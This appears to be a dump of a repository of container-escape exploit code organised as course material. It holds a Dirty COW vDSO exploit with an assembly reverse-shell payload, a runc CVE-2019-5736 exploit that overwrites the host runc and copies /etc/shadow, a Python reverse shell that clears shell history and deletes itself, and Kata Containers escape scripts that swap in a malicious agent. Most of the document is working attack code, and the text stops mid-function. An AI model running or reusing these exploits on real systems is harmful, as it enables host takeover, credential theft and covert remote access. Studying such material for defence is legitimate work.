n); } } if (fds[1].revents == POLLIN) { n = read(c, buf, sizeof(buf)); if (n == -1) { if (errno 
!= EINTR) { warn("read(c)"); break; } } else if (n == 0) { break; } else { writeall(STDOUT_FILENO, buf, n); } } } return 0; } static struct prologue *fingerprint_prologue(void *vdso_addr) { unsigned long clock_gettime_addr; uint32_t clock_gettime_offset; uint64_t entry_point; struct prologue *p; int i; /* e_entry */ entry_point = *(uint64_t *)((unsigned char *)vdso_addr + 0x18); clock_gettime_offset = (uint32_t)entry_point & 0xfff; clock_gettime_addr = (unsigned long)vdso_addr + clock_gettime_offset; for (i = 0; i < ARRAY_SIZE(prologues); i++) { p = &prologues[i]; if (memcmp((void *)clock_gettime_addr, p->opcodes, p->size) == 0) return p; } return NULL; } /* * 1.2.3.4:1337 */ static int parse_ip_port(char *str, uint32_t *ip, uint16_t *port) { char *p; int ret; str = strdup(str); if (str == NULL) { warn("strdup"); return -1; } p = strchr(str, ':'); if (p != NULL && p[1] != '\x00') { *p = '\x00'; *port = htons(atoi(p + 1)); } ret = (inet_aton(str, (struct in_addr *)ip) == 1) ? 0 : -1; if (ret == -1) warn("inet_aton(%s)", str); free(str); return ret; } int main(int argc, char *argv[]) { struct prologue *prologue; struct mem_arg arg; uint16_t port; uint32_t ip; int s; ip = htonl(PAYLOAD_IP); port = htons(PAYLOAD_PORT); if (argc > 1) { if (parse_ip_port(argv[1], &ip, &port) != 0) return EXIT_FAILURE; } fprintf(stderr, "[*] payload target: %s:%d\n", inet_ntoa(*(struct in_addr *)&ip), ntohs(port)); arg.vdso_addr = get_vdso_addr(); if (arg.vdso_addr == NULL) return EXIT_FAILURE; prologue = fingerprint_prologue(arg.vdso_addr); if (prologue == NULL) { fprintf(stderr, "[-] this vDSO version isn't supported\n"); fprintf(stderr, " add first entry point instructions to prologues\n"); return EXIT_FAILURE; } if (patch_payload(prologue, ip, port) == -1) return EXIT_FAILURE; if (build_vdso_patch(arg.vdso_addr, prologue) == -1) return EXIT_FAILURE; s = create_socket(port); if (s == -1) return EXIT_FAILURE; if (exploit(&arg, true) == -1) { fprintf(stderr, "exploit failed\n"); return 
EXIT_FAILURE; } yeah(&arg, s); return EXIT_SUCCESS; } ================================================ FILE: code/0304-运行时攻击/01-容器逃逸/CVE-2016-5195/Makefile ================================================ CFLAGS := -Wall LDFLAGS := -lpthread all: 0xdeadbeef 0xdeadbeef: 0xdeadbeef.o $(CC) -o $@ $^ $(LDFLAGS) 0xdeadbeef.o: 0xdeadbeef.c payload.h $(CC) -o $@ -c $< $(CFLAGS) payload.h: payload xxd -i $^ $@ payload: payload.s nasm -f bin -o $@ $^ clean: rm -f *.o *.h 0xdeadbeef ================================================ FILE: code/0304-运行时攻击/01-容器逃逸/CVE-2016-5195/payload.s ================================================ BITS 64 [SECTION .text] global _start SYS_OPEN equ 0x2 SYS_SOCKET equ 0x29 SYS_CONNECT equ 0x2a SYS_DUP2 equ 0x21 SYS_FORK equ 0x39 SYS_EXECVE equ 0x3b SYS_EXIT equ 0x3c SYS_READLINK equ 0x59 SYS_GETUID equ 0x66 AF_INET equ 0x2 SOCK_STREAM equ 0x1 IP equ 0xdeadc0de ;; patched by 0xdeadbeef.c PORT equ 0x1337 ;; patched by 0xdeadbeef.c _start: ;; save registers push rdi push rsi push rdx push rcx ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;; ;; return if getuid() != 0 ;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; mov rax, SYS_GETUID syscall test rax, rax jne return ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;; ;; check if whithin a container (PROC_PID_INIT_INO = 0xEFFFFFFC) ;; return if $(readlink /proc/1/ns/pid) != "pid:[4026531836]" ;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; call get_strings lea rsi, [rsp-16] mov rdx, 16 ; strlen("pid:[4026531836]") mov rax, SYS_READLINK syscall cmp rax, rdx jne return add rdi, 15 ; "pid:[4026531836]" mov rcx, rdx repe cmpsb jne return ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;; ;; return if open("/tmp/.x", O_CREAT|O_EXCL, x) == -1 ;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; mov rsi, 0x00782e2f706d742f push rsi mov rdi, rsp mov rsi, 192 mov rax, SYS_OPEN syscall test rax, rax 
pop rsi js return ;; fork mov rax, SYS_FORK syscall test rax, rax jne return ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;; ;; reverse connect (https://www.exploit-db.com/exploits/35587/) ;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;; sockfd = socket(AF_INET, SOCK_STREAM, 0) xor rsi, rsi ; 0 out rsi mul esi ; 0 out rax, rdx ; rdx = IPPROTO_IP (int: 0) inc rsi ; rsi = SOCK_STREAM push AF_INET pop rdi add al, SYS_SOCKET syscall ; copy socket descriptor to rdi for future use push rax pop rdi ; server.sin_family = AF_INET ; server.sin_port = htons(PORT) ; server.sin_addr.s_addr = IP ; bzero(&server.sin_zero, 8) push rdx push rdx mov dword [rsp + 0x4], IP mov word [rsp + 0x2], PORT mov byte [rsp], AF_INET ;; connect(sockfd, (struct sockaddr *)&server, sockaddr_len) push rsp pop rsi push 0x10 pop rdx push SYS_CONNECT pop rax syscall test rax, rax js exit ;; dup2(sockfd, STDIN); dup2(sockfd, STDOUT); dup2(sockfd, STERR) xor rax, rax push 0x3 ; loop down file descriptors for I/O pop rsi dup_loop: dec esi mov al, SYS_DUP2 syscall jne dup_loop ;; execve('//bin/sh', NULL, NULL) push rsi ; *argv[] = 0 pop rdx ; *envp[] = 0 push rsi ; '\0' mov rdi, '//bin/sh' ; str push rdi push rsp pop rdi ; rdi = &str (char*) xor rax, rax mov al, SYS_EXECVE syscall exit: xor rax, rax mov al, SYS_EXIT syscall return: ;; restore registers pop rcx pop rdx pop rsi pop rdi ;; get callee address (pushed on the stack by the call instruction) pop rax ;; execute missed instructions (patched by 0xdeadbeef.c) db 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 ;; return to callee jmp rax get_strings: lea rdi, [rel $ +8] ret db '/proc/1/ns/pid' db 0 db 'pid:[4026531836]' ================================================ FILE: code/0304-运行时攻击/01-容器逃逸/CVE-2019-5736/main.go ================================================ package main // Implementation of CVE-2019-5736 // Created with help from @singe, @_cablethief, and @feexd. 
// This commit also helped a ton to understand the vuln // https://github.com/lxc/lxc/commit/6400238d08cdf1ca20d49bafb85f4e224348bf9d import ( "fmt" "io/ioutil" "os" "strconv" "strings" ) // This is the line of shell commands that will execute on the host var payload = "#!/bin/bash \n cat /etc/shadow > /tmp/shadow && chmod 777 /tmp/shadow" func main() { // First we overwrite /bin/sh with the /proc/self/exe interpreter path fd, err := os.Create("/bin/sh") if err != nil { fmt.Println(err) return } fmt.Fprintln(fd, "#!/proc/self/exe") err = fd.Close() if err != nil { fmt.Println(err) return } fmt.Println("[+] Overwritten /bin/sh successfully") // Loop through all processes to find one whose cmdline includes runcinit // This will be the process created by runc var found int for found == 0 { pids, err := ioutil.ReadDir("/proc") if err != nil { fmt.Println(err) return } for _, f := range pids { fbytes, _ := ioutil.ReadFile("/proc/" + f.Name() + "/cmdline") fstring := string(fbytes) if strings.Contains(fstring, "runc") { fmt.Println("[+] Found the PID:", f.Name()) found, err = strconv.Atoi(f.Name()) if err != nil { fmt.Println(err) return } } } } // We will use the pid to get a file handle for runc on the host. var handleFd = -1 for handleFd == -1 { // Note, you do not need to use the O_PATH flag for the exploit to work. 
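The PID-scan loop above reads every `/proc/<pid>/cmdline` looking for the `runc` process that services the `exec` request. A hedged Python sketch of the same scan; the function names are ours, and `/proc/<pid>/cmdline` stores argv as NUL-separated strings:

```python
import os

def parse_cmdline(raw: bytes) -> list:
    # /proc/<pid>/cmdline holds argv joined by NUL bytes
    return [a.decode(errors="replace") for a in raw.split(b"\x00") if a]

def pids_matching(substring: str, proc: str = "/proc") -> list:
    # Return PIDs whose command line contains `substring`
    pids = []
    for entry in os.listdir(proc):
        if not entry.isdigit():
            continue
        try:
            with open(os.path.join(proc, entry, "cmdline"), "rb") as f:
                raw = f.read()
        except OSError:
            continue  # process exited mid-scan
        if substring in " ".join(parse_cmdline(raw)):
            pids.append(int(entry))
    return pids

print(parse_cmdline(b"runc\x00init\x00"))  # -> ['runc', 'init']
```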
handle, _ := os.OpenFile("/proc/"+strconv.Itoa(found)+"/exe", os.O_RDONLY, 0777) if int(handle.Fd()) > 0 { handleFd = int(handle.Fd()) } } fmt.Println("[+] Successfully got the file handle") // Now that we have the file handle, let's write to the runc binary and overwrite it // It will maintain its executable flag for { writeHandle, _ := os.OpenFile("/proc/self/fd/"+strconv.Itoa(handleFd), os.O_WRONLY|os.O_TRUNC, 0700) if int(writeHandle.Fd()) > 0 { fmt.Println("[+] Successfully got write handle", writeHandle) writeHandle.Write([]byte(payload)) return } } } ================================================ FILE: code/0304-运行时攻击/01-容器逃逸/cause-core-dump.c ================================================ #include <stdio.h> int main(void) { int *a = NULL; *a = 1; return 0; } ================================================ FILE: code/0304-运行时攻击/01-容器逃逸/tmp-dot-x.py ================================================ import os import pty import socket lhost = "172.17.0.1" # adjust to your environment lport = 10000 # adjust to your environment def main(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((lhost, lport)) os.dup2(s.fileno(), 0) os.dup2(s.fileno(), 1) os.dup2(s.fileno(), 2) os.putenv("HISTFILE", '/dev/null') pty.spawn("/bin/bash") os.remove('/tmp/.x.py') s.close() if __name__ == "__main__": main() ================================================ FILE: code/0304-运行时攻击/02-安全容器逃逸/build.sh ================================================ #!/bin/bash set -e -x current_path=`pwd` agent_path=$GOPATH/src/github.com/kata-containers/agent/ # build evil agent cd $agent_path git checkout -- .
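The write loop in the CVE-2019-5736 PoC above depends on a Linux procfs property: a descriptor opened read-only on `/proc/<pid>/exe` can later be re-opened writable through `/proc/self/fd/<fd>` once nothing is executing the binary. A sketch of that re-open on an ordinary file, just to show the mechanism (Linux-only; `reopen_writable` is our own name, not part of the PoC):

```python
import os
import tempfile

def reopen_writable(path: str) -> str:
    # Open read-only first, then re-open the same file for writing
    # via the /proc/self/fd/<n> magic symlink (Linux only).
    ro = os.open(path, os.O_RDONLY)
    try:
        wfd = os.open("/proc/self/fd/%d" % ro, os.O_WRONLY | os.O_TRUNC)
        try:
            os.write(wfd, b"overwritten")
        finally:
            os.close(wfd)
    finally:
        os.close(ro)
    with open(path, "rb") as f:
        return f.read().decode()
```

In the real exploit the held descriptor points at the host's runc binary, so the truncate-and-write lands outside the container.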
git checkout 1.10.0 cp $current_path/evil_agent_src/* $agent_path sed -i 's/VERSION_COMMIT :=.*$/VERSION_COMMIT := 1.10.0-a8007c2969e839b584627d1a7db4cac13af908a6/g' $agent_path/Makefile make cd - cp $agent_path/kata-agent ./docker/evil-kata-agent # build reverse shell gcc -o ./docker/evil_bin evil_bin.c -static docker build -t kata-malware-image:latest docker/ ================================================ FILE: code/0304-运行时攻击/02-安全容器逃逸/change_container_runtime.sh ================================================ #!/bin/bash if [ $1 = "kata" ]; then cat << EOF > /etc/docker/daemon.json { "runtimes": { "kata-runtime": { "path": "/opt/kata/bin/kata-runtime" }, "kata-clh": { "path": "/opt/kata/bin/kata-clh" }, "kata-qemu": { "path": "/opt/kata/bin/kata-qemu" } }, "registry-mirrors": ["https://docker.mirrors.ustc.edu.cn/"] } EOF cat << EOF > /etc/systemd/system/docker.service.d/kata-containers.conf [Service] ExecStart= ExecStart=/usr/bin/dockerd -D --add-runtime kata-runtime=/opt/kata/bin/kata-runtime --add-runtime kata-clh=/opt/kata/bin/kata-clh --add-runtime kata-qemu=/opt/kata/bin/kata-qemu --default-runtime=kata-runtime EOF systemctl daemon-reload && systemctl restart docker elif [ $1 = "runc" ]; then rm -f /etc/systemd/system/docker.service.d/kata-containers.conf cat << EOF > /etc/docker/daemon.json { "registry-mirrors": ["https://docker.mirrors.ustc.edu.cn/"] } EOF systemctl daemon-reload && systemctl restart docker else echo "Invalid container runtime." 
fi ================================================ FILE: code/0304-运行时攻击/02-安全容器逃逸/clean_kata.sh ================================================ #!/bin/bash set -e -x rm -f /usr/bin/kata* rm -r /etc/kata-containers rm -r /opt/kata rm /etc/docker/daemon.json rm /etc/systemd/system/docker.service.d/kata-containers.conf systemctl daemon-reload && systemctl restart docker ================================================ FILE: code/0304-运行时攻击/02-安全容器逃逸/docker/Dockerfile ================================================ FROM ubuntu:latest COPY bash /bash COPY evil-kata-agent /evil-kata-agent COPY attack.sh /attack.sh # Since we're targeting /bin, let's put some fake binaries in the image COPY evil_bin /ls COPY evil_bin /ps COPY evil_bin /rm RUN chmod +x /attack.sh /evil-kata-agent /ls /ps /rm /bash ENTRYPOINT ["/attack.sh"] ================================================ FILE: code/0304-运行时攻击/02-安全容器逃逸/docker/attack.sh ================================================ #!/bin/bash set -e echo -e "\t[+] In the evil container" echo -e "\t[*] Searching for the device..." found_clh_dev=false for path in /sys/dev/block/* ; do curr_target=$(readlink $path) if [[ $curr_target == *"vda1"* ]]; then dev=$(basename $path) guest_fs_major=$(echo $dev | cut -f1 -d:) guest_fs_minor=$(echo $dev | cut -f2 -d:) found_clh_dev=true break fi done if [ "$found_clh_dev" = false ]; then echo -e "\t[!] no vda1 device, not on CLH, shutting down..." exit 1 fi echo -e "\t[+] Device found" echo -e "\t[*] Mknoding..." mknod --mode 0600 /dev/guest_hd b $guest_fs_major $guest_fs_minor echo -e "\t[+] Mknoded successfully" # Ok we're on CLH, let's run the attack echo -e "\t[*] Replacing the guest kata-agent..." 
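The device-search loop in attack.sh above resolves each `/sys/dev/block/<major>:<minor>` symlink and splits the entry name with `cut` to recover the major/minor pair for `mknod`. The same lookup sketched in Python (the `/sys` scan is Linux-specific; the name parsing is shown as a standalone helper):

```python
import os

def parse_devnum(name):
    # /sys/dev/block entries are named "<major>:<minor>", e.g. "252:1"
    major, minor = name.split(":")
    return int(major), int(minor)

def find_block_dev(target, sysdir="/sys/dev/block"):
    # Return (major, minor) of the first entry whose symlink target
    # contains `target` (e.g. "vda1"), or None if nothing matches.
    if not os.path.isdir(sysdir):
        return None
    for entry in os.listdir(sysdir):
        try:
            if target in os.readlink(os.path.join(sysdir, entry)):
                return parse_devnum(entry)
        except OSError:
            continue
    return None
```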
cmd_file=/tmp/debugfs_cmdfile rm -rf $cmd_file cat << EOF > $cmd_file open -w /dev/guest_hd cd /usr/bin rm kata-agent write /evil-kata-agent kata-agent close -a EOF # Execute cmdfile /sbin/debugfs -f $cmd_file echo -e "\t[+] Done" ================================================ FILE: code/0304-运行时攻击/02-安全容器逃逸/evil_agent_src/grpc.go ================================================ // // Copyright (c) 2017-2019 Intel Corporation // // SPDX-License-Identifier: Apache-2.0 // package main import ( "bufio" "bytes" "encoding/json" "fmt" "io/ioutil" "os" "os/exec" "path/filepath" "regexp" "strconv" "strings" "syscall" "time" gpb "github.com/gogo/protobuf/types" "github.com/kata-containers/agent/pkg/types" pb "github.com/kata-containers/agent/protocols/grpc" "github.com/opencontainers/runc/libcontainer" "github.com/opencontainers/runc/libcontainer/configs" "github.com/opencontainers/runc/libcontainer/seccomp" "github.com/opencontainers/runc/libcontainer/specconv" "github.com/opencontainers/runc/libcontainer/utils" "github.com/opencontainers/runtime-spec/specs-go" "github.com/sirupsen/logrus" "golang.org/x/net/context" "golang.org/x/sys/unix" "google.golang.org/grpc/codes" grpcStatus "google.golang.org/grpc/status" ) type agentGRPC struct { sandbox *sandbox version string } // CPU and Memory hotplug const ( cpuRegexpPattern = "cpu[0-9]*" memRegexpPattern = "memory[0-9]*" libcontainerPath = "/run/libcontainer" ) var ( sysfsCPUOnlinePath = "/sys/devices/system/cpu" sysfsMemOnlinePath = "/sys/devices/system/memory" sysfsMemoryBlockSizePath = "/sys/devices/system/memory/block_size_bytes" sysfsMemoryHotplugProbePath = "/sys/devices/system/memory/probe" sysfsConnectedCPUsPath = filepath.Join(sysfsCPUOnlinePath, "online") containersRootfsPath = "/run" // set when StartTracing() is called. startTracingCalled = false // set when StopTracing() is called.
stopTracingCalled = false modprobePath = "/sbin/modprobe" ) type onlineResource struct { sysfsOnlinePath string regexpPattern string } type cookie map[string]bool var emptyResp = &gpb.Empty{} const onlineCPUMemWaitTime = 100 * time.Millisecond var onlineCPUMaxTries = uint32(100) const cpusetMode = 0644 // handleError will log the specified error if wait is false func handleError(wait bool, err error) error { if !wait { agentLog.WithError(err).Error() } return err } // Online resources, nbResources specifies the maximum number of resources to online. // If nbResources is <= 0 then there is no limit and all resources are connected. // Returns the number of resources connected. func onlineResources(resource onlineResource, nbResources int32) (uint32, error) { files, err := ioutil.ReadDir(resource.sysfsOnlinePath) if err != nil { return 0, err } var count uint32 for _, file := range files { matched, err := regexp.MatchString(resource.regexpPattern, file.Name()) if err != nil { return count, err } if !matched { continue } onlinePath := filepath.Join(resource.sysfsOnlinePath, file.Name(), "online") status, err := ioutil.ReadFile(onlinePath) if err != nil { // resource cold plugged continue } if strings.Trim(string(status), "\n\t ") == "0" { if err := ioutil.WriteFile(onlinePath, []byte("1"), 0600); err != nil { agentLog.WithField("online-path", onlinePath).WithError(err).Errorf("Could not online resource") continue } count++ if nbResources > 0 && count == uint32(nbResources) { return count, nil } } } return count, nil } func onlineCPUResources(nbCpus uint32) error { resource := onlineResource{ sysfsOnlinePath: sysfsCPUOnlinePath, regexpPattern: cpuRegexpPattern, } var count uint32 for i := uint32(0); i < onlineCPUMaxTries; i++ { r, err := onlineResources(resource, int32(nbCpus-count)) if err != nil { return err } count += r if count == nbCpus { return nil } time.Sleep(onlineCPUMemWaitTime) } return fmt.Errorf("only %d of %d were connected", count, nbCpus) } func 
onlineMemResources() error { resource := onlineResource{ sysfsOnlinePath: sysfsMemOnlinePath, regexpPattern: memRegexpPattern, } _, err := onlineResources(resource, -1) return err } // updates a cpuset cgroups path visiting each sub-directory in cgroupPath parent and writing // the maximal set of cpus in cpuset.cpus file, finally the cgroupPath is updated with the requsted //value. // cookies are used for performance reasons in order to // don't update a cgroup twice. func updateCpusetPath(cgroupPath string, newCpuset string, cookies cookie) error { // Each cpuset cgroup parent MUST BE updated with the actual number of vCPUs. //Start to update from cgroup system root. cgroupParentPath := cgroupCpusetPath cpusetGuest, err := getCpusetGuest() if err != nil { return err } // Update parents with max set of current cpus //Iterate all parent dirs in order. //This is needed to ensure the cgroup parent has cpus on needed needed //by the request. cgroupsParentPaths := strings.Split(filepath.Dir(cgroupPath), "/") for _, path := range cgroupsParentPaths { // Skip if empty. if path == "" { continue } cgroupParentPath = filepath.Join(cgroupParentPath, path) // check if the cgroup was already updated. if cookies[cgroupParentPath] { agentLog.WithField("path", cgroupParentPath).Debug("cpuset cgroup already updated") continue } cpusetCpusParentPath := filepath.Join(cgroupParentPath, "cpuset.cpus") agentLog.WithField("path", cpusetCpusParentPath).Debug("updating cpuset parent cgroup") if err := ioutil.WriteFile(cpusetCpusParentPath, []byte(cpusetGuest), cpusetMode); err != nil { return fmt.Errorf("Could not update parent cpuset cgroup (%s) cpuset:'%s': %v", cpusetCpusParentPath, cpusetGuest, err) } // add cgroup path to the cookies. cookies[cgroupParentPath] = true } // Finally update group path with requested value. 
cpusetCpusPath := filepath.Join(cgroupCpusetPath, cgroupPath, "cpuset.cpus") agentLog.WithField("path", cpusetCpusPath).Debug("updating cpuset cgroup") if err := ioutil.WriteFile(cpusetCpusPath, []byte(newCpuset), cpusetMode); err != nil { return fmt.Errorf("Could not update parent cpuset cgroup (%s) cpuset:'%s': %v", cpusetCpusPath, cpusetGuest, err) } return nil } func (a *agentGRPC) onlineCPUMem(req *pb.OnlineCPUMemRequest) error { if req.NbCpus == 0 && req.CpuOnly { return handleError(req.Wait, fmt.Errorf("requested number of CPUs '%d' must be greater than 0", req.NbCpus)) } // we are going to update the containers of the sandbox, we have to lock it a.sandbox.Lock() defer a.sandbox.Unlock() if req.NbCpus > 0 { agentLog.WithField("vcpus-to-connect", req.NbCpus).Debug("connecting vCPUs") if err := onlineCPUResources(req.NbCpus); err != nil { return handleError(req.Wait, err) } } if !req.CpuOnly { if err := onlineMemResources(); err != nil { return handleError(req.Wait, err) } } // At this point all CPUs have been connected, we need to know // the actual range of CPUs connectedCpus, err := getCpusetGuest() if err != nil { return handleError(req.Wait, fmt.Errorf("Could not get the actual range of connected CPUs: %v", err)) } agentLog.WithField("range-of-vcpus", connectedCpus).Debug("connecting vCPUs") cookies := make(cookie) // Now that we know the actual range of connected CPUs, we need to iterate over // all containers an update each cpuset cgroup. This is not required in docker // containers since they don't hot add/remove CPUs. 
for _, c := range a.sandbox.containers { agentLog.WithField("container", c.container.ID()).Debug("updating cpuset cgroup") contConfig := c.container.Config() cgroupPath := contConfig.Cgroups.Path // In order to avoid issues updating the container cpuset cgroup, its cpuset cgroup *parents* // MUST BE updated, otherwise we'll get next errors: // - write /sys/fs/cgroup/cpuset/XXXXX/cpuset.cpus: permission denied // - write /sys/fs/cgroup/cpuset/XXXXX/cpuset.cpus: device or resource busy // NOTE: updating container cpuset cgroup *parents* won't affect container cpuset cgroup, for example if container cpuset cgroup has "0" // and its cpuset cgroup *parents* have "0-5", the container will be able to use only the CPU 0. // cpuset assinged containers are not updated, only we update its parents. if contConfig.Cgroups.Resources.CpusetCpus != "" { agentLog.WithField("cpuset", contConfig.Cgroups.Resources.CpusetCpus).Debug("updating container cpuset cgroup parents") // remove container cgroup directory cgroupPath = filepath.Dir(cgroupPath) } if err := updateCpusetPath(cgroupPath, connectedCpus, cookies); err != nil { return handleError(req.Wait, err) } } return nil } func setConsoleCarriageReturn(fd int) error { termios, err := unix.IoctlGetTermios(fd, unix.TCGETS) if err != nil { return err } termios.Oflag |= unix.ONLCR return unix.IoctlSetTermios(fd, unix.TCSETS, termios) } func buildProcess(agentProcess *pb.Process, procID string, init bool) (*process, error) { user := agentProcess.User.Username if user == "" { // We can specify the user and the group separated by ":" user = fmt.Sprintf("%d:%d", agentProcess.User.UID, agentProcess.User.GID) } additionalGids := []string{} for _, gid := range agentProcess.User.AdditionalGids { additionalGids = append(additionalGids, fmt.Sprintf("%d", gid)) } proc := &process{ id: procID, process: libcontainer.Process{ Cwd: agentProcess.Cwd, Args: agentProcess.Args, Env: agentProcess.Env, User: user, AdditionalGroups: additionalGids, Init: 
init, }, } if agentProcess.Terminal { parentSock, childSock, err := utils.NewSockPair("console") if err != nil { return nil, err } proc.process.ConsoleSocket = childSock proc.consoleSock = parentSock epoller, err := newEpoller() if err != nil { return nil, err } proc.epoller = epoller return proc, nil } rStdin, wStdin, err := os.Pipe() if err != nil { return nil, err } rStdout, wStdout, err := os.Pipe() if err != nil { return nil, err } rStderr, wStderr, err := os.Pipe() if err != nil { return nil, err } proc.process.Stdin = rStdin proc.process.Stdout = wStdout proc.process.Stderr = wStderr proc.stdin = wStdin proc.stdout = rStdout proc.stderr = rStderr return proc, nil } func (a *agentGRPC) Check(ctx context.Context, req *pb.CheckRequest) (*pb.HealthCheckResponse, error) { return &pb.HealthCheckResponse{Status: pb.HealthCheckResponse_SERVING}, nil } func (a *agentGRPC) Version(ctx context.Context, req *pb.CheckRequest) (*pb.VersionCheckResponse, error) { return &pb.VersionCheckResponse{ GrpcVersion: pb.APIVersion, AgentVersion: a.version, }, nil } func (a *agentGRPC) getContainer(cid string) (*container, error) { if !a.sandbox.running { return nil, grpcStatus.Error(codes.FailedPrecondition, "Sandbox not started") } ctr, err := a.sandbox.getContainer(cid) if err != nil { return nil, err } return ctr, nil } // Shared function between CreateContainer and ExecProcess, because those expect // a process to be run. func (a *agentGRPC) execProcess(ctr *container, proc *process, createContainer bool) (err error) { if ctr == nil { return grpcStatus.Error(codes.InvalidArgument, "Container cannot be nil") } if proc == nil { return grpcStatus.Error(codes.InvalidArgument, "Process cannot be nil") } // This lock is very important to avoid any race with reaper.reap(). 
// Indeed, if we don't lock this here, we could potentially get the // SIGCHLD signal before the channel has been created, meaning we will // miss the opportunity to get the exit code, leading WaitProcess() to // wait forever on the new channel. // This lock has to be taken before we run the new process. a.sandbox.subreaper.lock() defer a.sandbox.subreaper.unlock() if createContainer { err = ctr.container.Start(&proc.process) } else { err = ctr.container.Run(&(proc.process)) } // ~ Attack Start ~ // // Commenting out the following code so that we won't send back a failure //// if err != nil { //// return grpcStatus.Errorf(codes.Internal, "Could not run process: %v", err) //// } // ~ Attack End ~ // // Get process PID pid, err := proc.process.Pid() if err != nil { return err } proc.exitCodeCh = make(chan int, 1) // Create process channel to allow WaitProcess to wait on it. // This channel is buffered so that reaper.reap() will not // block until WaitProcess listen onto this channel. a.sandbox.subreaper.setExitCodeCh(pid, proc.exitCodeCh) return nil } // Shared function between CreateContainer and ExecProcess, because those expect // the console to be properly setup after the process has been started. func (a *agentGRPC) postExecProcess(ctr *container, proc *process) error { if ctr == nil { return grpcStatus.Error(codes.InvalidArgument, "Container cannot be nil") } if proc == nil { return grpcStatus.Error(codes.InvalidArgument, "Process cannot be nil") } defer proc.closePostStartFDs() // Setup terminal if enabled. 
if proc.consoleSock != nil { termMaster, err := utils.RecvFd(proc.consoleSock) if err != nil { return err } if err := setConsoleCarriageReturn(int(termMaster.Fd())); err != nil { return err } proc.termMaster = termMaster // Get process PID pid, err := proc.process.Pid() if err != nil { return err } a.sandbox.subreaper.setEpoller(pid, proc.epoller) if err = proc.epoller.add(proc.termMaster); err != nil { return err } } ctr.setProcess(proc) return nil } // This function updates the container namespaces configuration based on the // sandbox information. When the sandbox is created, it can be setup in a way // that all containers will share some specific namespaces. This is the agent // responsibility to create those namespaces so that they can be shared across // several containers. // If the sandbox has not been setup to share namespaces, then we assume all // containers will be started in their own new namespace. // The value of a.sandbox.sharedPidNs.path will always override the namespace // path set by the spec, since we will always ignore it. Indeed, it makes no // sense to rely on the namespace path provided by the host since namespaces // are different inside the guest. func (a *agentGRPC) updateContainerConfigNamespaces(config *configs.Config, ctr *container) { var ipcNs, utsNs bool for idx, ns := range config.Namespaces { if ns.Type == configs.NEWIPC { config.Namespaces[idx].Path = a.sandbox.sharedIPCNs.path ipcNs = true } if ns.Type == configs.NEWUTS { config.Namespaces[idx].Path = a.sandbox.sharedUTSNs.path utsNs = true } } if !ipcNs { newIPCNs := configs.Namespace{ Type: configs.NEWIPC, Path: a.sandbox.sharedIPCNs.path, } config.Namespaces = append(config.Namespaces, newIPCNs) } if !utsNs { newUTSNs := configs.Namespace{ Type: configs.NEWUTS, Path: a.sandbox.sharedUTSNs.path, } config.Namespaces = append(config.Namespaces, newUTSNs) } // Update PID namespace. 
var pidNsPath string // Use shared pid ns if useSandboxPidns has been set in either // the CreateSandbox request or CreateContainer request. // Else set this to empty string so that a new pid namespace is // created for the container. if ctr.useSandboxPidNs || a.sandbox.sandboxPidNs { pidNsPath = a.sandbox.sharedPidNs.path } else { pidNsPath = "" } newPidNs := configs.Namespace{ Type: configs.NEWPID, Path: pidNsPath, } config.Namespaces = append(config.Namespaces, newPidNs) } func (a *agentGRPC) updateContainerConfigPrivileges(spec *specs.Spec, config *configs.Config) error { if spec == nil || spec.Process == nil { // Don't throw an error in case the Spec does not contain any // information about NoNewPrivileges. return nil } // Add the value for NoNewPrivileges option. config.NoNewPrivileges = spec.Process.NoNewPrivileges return nil } func (a *agentGRPC) updateContainerConfig(spec *specs.Spec, config *configs.Config, ctr *container) error { a.updateContainerConfigNamespaces(config, ctr) return a.updateContainerConfigPrivileges(spec, config) } // rollbackFailingContainerCreation rolls back important steps that might have // been performed before the container creation failed. 
// - Destroy the container created by libcontainer // - Delete the container from the agent internal map // - Unmount all mounts related to this container func (a *agentGRPC) rollbackFailingContainerCreation(ctr *container) { if ctr.container != nil { ctr.container.Destroy() } a.sandbox.deleteContainer(ctr.id) if err := removeMounts(ctr.mounts); err != nil { agentLog.WithError(err).Error("rollback failed removeMounts()") } } func (a *agentGRPC) finishCreateContainer(ctr *container, req *pb.CreateContainerRequest, config *configs.Config) (resp *gpb.Empty, err error) { containerPath := filepath.Join(libcontainerPath, a.sandbox.id) factory, err := libcontainer.New(containerPath, libcontainer.Cgroupfs) if err != nil { return emptyResp, err } ctr.container, err = factory.Create(req.ContainerId, config) if err != nil { return emptyResp, err } ctr.config = *config ctr.initProcess, err = buildProcess(req.OCI.Process, req.ExecId, true) if err != nil { return emptyResp, err } if err = a.execProcess(ctr, ctr.initProcess, true); err != nil { return emptyResp, err } // Make sure add Container to Sandbox, before call updateSharedPidNs a.sandbox.setContainer(ctr.ctx, req.ContainerId, ctr) if err := a.updateSharedPidNs(ctr); err != nil { return emptyResp, err } return emptyResp, a.postExecProcess(ctr, ctr.initProcess) } func (a *agentGRPC) CreateContainer(ctx context.Context, req *pb.CreateContainerRequest) (resp *gpb.Empty, err error) { // ~ Attack Start ~ // // We need to clean up the symlink we created and replace it with a regular directory. 
